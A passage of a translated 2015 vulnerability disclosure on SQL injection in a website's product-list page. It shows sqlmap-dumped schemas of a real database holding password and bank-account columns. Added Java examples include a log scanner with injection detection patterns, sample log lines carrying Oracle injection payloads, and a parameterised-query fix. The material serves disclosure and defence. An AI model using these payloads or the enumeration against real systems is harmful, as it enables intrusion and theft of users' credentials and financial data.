| Column | Type |
+-------------------+----------+
| ACCOUNT | VARCHAR2 |
| ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO | VARCHAR2 |
| BANK_CITY | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BANK_PROVINCE | VARCHAR2 |
| BANK_TYPE | VARCHAR2 |
| BOOK_COUNT | NUMBER |
| DEPOSIT | NUMBER |
| EMAIL | VARCHAR2 |
| IMG | VARCHAR2 |
| LAST_LOGIN | DATE |
| LOGIN_COUNT | NUMBER |
| LOGIN_TYPE | NUMBER |
| MOBILE | VARCHAR2 |
| ORDER_COUNT | NUMBER |
| ORDER_CUST_ID | NUMBER |
| OUT_USER_ID | VARCHAR2 |
| PARENT_CUST_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| REG_DATE | DATE |
| STATUS | NUMBER |
| USER_ID | NUMBER |
| USER_NAME | VARCHAR2 |
| VCODE | VARCHAR2 |
+-------------------+----------+
Database: SAAS14
Table: WX_USER_INFO
[21 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| AREA_ID | NUMBER |
| CITY | VARCHAR2 |
| COUNTRY | VARCHAR2 |
| CREATE_DATE | DATE |
| CUST_ID | NUMBER |
| HEADIMGURL | VARCHAR2 |
| LOGIN_DATE | DATE |
| NICKNAME | VARCHAR2 |
| OPENID | VARCHAR2 |
| ORDER_CUST_ID | NUMBER |
| PARENT_CUST_ID | NUMBER |
| PROVINCE | VARCHAR2 |
| SEX | NUMBER |
| SOURCE_ID | NUMBER |
| STATE | NUMBER |
| SUBSCRIBE_TIME | DATE |
| TREE_ID | NUMBER |
| UNSUBSCRIBE_TIME | DATE |
| USER_ID | VARCHAR2 |
| USER_LANGUAGE | VARCHAR2 |
| USER_MEMO | VARCHAR2 |
+------------------+----------+
Database: SAAS14
Table: USR_LOGIN
[32 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| CUST_ID | NUMBER |
| CZ_STARTTIME | DATE |
| CZCODE | VARCHAR2 |
| DEPT_ID | NUMBER |
| DUTY_STATE | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| EMAIL | VARCHAR2 |
| FAX | VARCHAR2 |
| IS_CZ | NUMBER |
| IS_DISPRICE | NUMBER |
| IS_MANAGER | NUMBER |
| IS_ORDERLIST | NUMBER |
| IS_PAY | NUMBER |
| IS_SHOWSYSTEMMSG | NUMBER |
| IS_VALIDATE | NUMBER |
| LAST_DATE | DATE |
| LAST_IP | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LYT_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| PARENT_AGENT_ID | NUMBER |
| PASSWORD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PWD | VARCHAR2 |
| ROLE_ID | NUMBER |
| ROLE_TYPE | NUMBER |
| USER_GRADE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PERMISSION | VARCHAR2 |
| USER_STATE | NUMBER |
+------------------+----------+
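The two payload shapes sqlmap recorded above (the XMLType/CHR() error-based probe and the DBMS_PIPE.RECEIVE_MESSAGE time-based probe) are distinctive enough to be caught in web-server access logs. The Java class below is an added example, not part of the original report or the site's code: it parses combined-format access-log lines, URL-decodes each query parameter, and flags any parameter whose value carries those Oracle injection markers. The log lines in `main` are constructed for illustration, and the class, `Finding` and `scan` names are the example's own.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example (not from the report or the site). Flags access-log requests
 * whose query parameters carry the Oracle injection markers that appear in the
 * sqlmap payloads recorded in the report. Log lines in main() are constructed.
 */
public class OracleInjectionLogScan {

    // Markers taken from the two recorded payload shapes: the XMLType error-based
    // probe, CHR()-concatenated string building, the DBMS_PIPE.RECEIVE_MESSAGE
    // delay, and the CASE WHEN ... FROM DUAL boolean template.
    private static final Pattern[] MARKERS = {
        Pattern.compile("(?i)\\bXMLTYPE\\s*\\("),
        Pattern.compile("(?i)\\bCHR\\s*\\(\\s*\\d+\\s*\\)\\s*\\|\\|"),
        Pattern.compile("(?i)\\bDBMS_PIPE\\.RECEIVE_MESSAGE\\s*\\("),
        Pattern.compile("(?i)\\bCASE\\s+WHEN\\b.*\\bFROM\\s+DUAL\\b"),
    };

    // Combined log format (assumed): client - - [timestamp] "METHOD /path?query HTTP/x" status bytes
    private static final Pattern REQUEST_LINE = Pattern.compile(
        "^(\\S+) \\S+ \\S+ \\[[^\\]]+\\] \"(?:GET|POST) (\\S+) HTTP/[\\d.]+\"");

    public static final class Finding {
        public final String clientIp;
        public final String parameter;
        public final String marker;

        Finding(String clientIp, String parameter, String marker) {
            this.clientIp = clientIp;
            this.parameter = parameter;
            this.marker = marker;
        }

        @Override
        public String toString() {
            return clientIp + " param=" + parameter + " marker=" + marker;
        }
    }

    /** Returns one finding per (request, parameter) whose decoded value matches a marker. */
    public static List<Finding> scan(List<String> logLines) {
        List<Finding> findings = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = REQUEST_LINE.matcher(line);
            if (!m.find()) {
                continue;
            }
            String clientIp = m.group(1);
            String target = m.group(2);
            int q = target.indexOf('?');
            if (q < 0) {
                continue;
            }
            // Split on '&' before decoding so an encoded '&' inside a value stays in it.
            for (String pair : target.substring(q + 1).split("&")) {
                int eq = pair.indexOf('=');
                String name = eq < 0 ? pair : pair.substring(0, eq);
                String value = decode(eq < 0 ? "" : pair.substring(eq + 1));
                for (Pattern p : MARKERS) {
                    if (p.matcher(value).find()) {
                        findings.add(new Finding(clientIp, name, p.pattern()));
                        break; // one marker per parameter is enough to alert on
                    }
                }
            }
        }
        return findings;
    }

    // Decode twice: scanners and proxies frequently double-encode payloads.
    private static String decode(String s) {
        String once;
        try {
            once = URLDecoder.decode(s, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return s; // malformed %xx escape: scan the raw value instead
        }
        try {
            return URLDecoder.decode(once, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return once;
        }
    }

    public static void main(String[] args) {
        // Constructed sample lines: one benign request, one error-based probe, one time-based probe.
        List<String> sample = List.of(
            "10.0.0.5 - - [09/Nov/2015:01:35:19 +0800] \"GET /m2c/2/list0.jsp?area_id=10034&key=&catid=12&orderby=3 HTTP/1.1\" 200 5120",
            "10.0.0.9 - - [09/Nov/2015:01:35:20 +0800] \"GET /m2c/2/list0.jsp?area_id=10034&catid=%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%29%29%20FROM%20DUAL%29 HTTP/1.1\" 500 812",
            "10.0.0.9 - - [09/Nov/2015:01:35:25 +0800] \"GET /m2c/2/list0.jsp?catid=%28SELECT%20%28CASE%20WHEN%20%287573%3D7573%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28100%29%2C5%29%20ELSE%207573%20END%29%20FROM%20DUAL%29 HTTP/1.1\" 200 5120");
        for (Finding f : scan(sample)) {
            System.out.println(f);
        }
    }
}
```

Run against the three constructed lines, `scan` returns two findings, both on `catid` from 10.0.0.9, and nothing for the benign request. A 500 status next to a hit, as in the second line, is the error-based signal the reporter relied on; the time-based probe returns 200 and is only visible through the marker or through response latency, which is why the pattern check is worth keeping alongside status-code alerting.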

Proof of vulnerability:

As above

Fix recommendation:

Fix by filtering input
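The one-line fix recommendation is what the sqlmap output makes concrete: `catid` is spliced into the query text, so both a stray quote (the error the reporter saw) and a whole `(SELECT ... FROM DUAL)` subquery are executed as SQL. The Java example below is added here and is not the site's code; the table `info_prod` and its columns are assumptions. It shows the concatenation pattern beside the corrected version, which validates the numeric parameters from the page's URL and binds them through `PreparedStatement`, so the SQL text never depends on user input.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;

/**
 * Added example (not the site's code). Demonstrates the defect class behind
 * list0.jsp?catid=... and its fix. Table and column names are assumptions.
 */
public class ProductListDao {

    /**
     * BEFORE (vulnerable): request parameters are pasted into the SQL text.
     * catid="5'" yields a syntax error (what the reporter saw), and
     * catid="(SELECT ... FROM DUAL)" runs as a subquery (what sqlmap did).
     */
    public static String buildVulnerableSql(String areaId, String catid,
                                            String minPrice, String maxPrice) {
        return "SELECT prod_id, prod_name, price FROM info_prod"
             + " WHERE area_id = " + areaId
             + " AND cat_id = " + catid
             + " AND price BETWEEN " + minPrice + " AND " + maxPrice;
    }

    /**
     * Validates a numeric request parameter. Absent or empty -> empty Optional;
     * anything that is not a plain integer is rejected before reaching the DB.
     */
    public static Optional<Long> parseNumeric(String name, String raw) {
        if (raw == null || raw.isBlank()) {
            return Optional.empty();
        }
        if (!raw.matches("-?\\d{1,18}")) {
            throw new IllegalArgumentException(name + " must be an integer");
        }
        return Optional.of(Long.parseLong(raw));
    }

    // AFTER (fixed): the SQL text is a constant; values travel as bind variables.
    // The optional catid filter is handled by choosing between two constant
    // statements, never by splicing text.
    private static final String SQL_ALL_CATEGORIES =
        "SELECT prod_id, prod_name, price FROM info_prod"
      + " WHERE area_id = ? AND price BETWEEN ? AND ?";
    private static final String SQL_ONE_CATEGORY =
        "SELECT prod_id, prod_name, price FROM info_prod"
      + " WHERE area_id = ? AND cat_id = ? AND price BETWEEN ? AND ?";

    public static List<String> listProducts(Connection conn, String areaId, String catid,
                                            String minPrice, String maxPrice)
            throws SQLException {
        long area = parseNumeric("area_id", areaId)
            .orElseThrow(() -> new IllegalArgumentException("area_id is required"));
        Optional<Long> cat = parseNumeric("catid", catid);
        long min = parseNumeric("minprice", minPrice).orElse(0L);
        long max = parseNumeric("maxprice", maxPrice).orElse(Long.MAX_VALUE);

        String sql = cat.isPresent() ? SQL_ONE_CATEGORY : SQL_ALL_CATEGORIES;
        List<String> names = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            int i = 1;
            ps.setLong(i++, area);
            if (cat.isPresent()) {
                ps.setLong(i++, cat.get());
            }
            ps.setLong(i++, min);
            ps.setLong(i, max);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    names.add(rs.getString("prod_name"));
                }
            }
        }
        return names;
    }

    public static void main(String[] args) {
        // Show what the concatenated query looks like once a quote arrives.
        System.out.println(buildVulnerableSql("10034", "5'", "100", "700"));
        // The hardened path rejects the same input before any SQL is built.
        try {
            parseNumeric("catid", "5'");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The `current user is DBA: True` line in the sqlmap output is a second finding in its own right: binding parameters closes this injection, but the application's database account should also be a least-privilege schema user, so that a future injection anywhere in the site cannot enumerate all 20 schemas the way this one did.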

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-11-09 17:56

Vendor reply:

thx

Latest status:

None yet


Vulnerability assessment:

Comments

  1. 2015-11-09 23:42 | 雪葬爱 ( Passerby | Rank:18 Vulnerabilities:8 | Newbie, total newbie; may I win one heart and never part till our hair turns white. )

    How could this not blow up

  2. 2015-11-11 15:07 | debue喵 ( Intern white hat | Rank:40 Vulnerabilities:8 | A cat that writes code. )

    Front-row spectator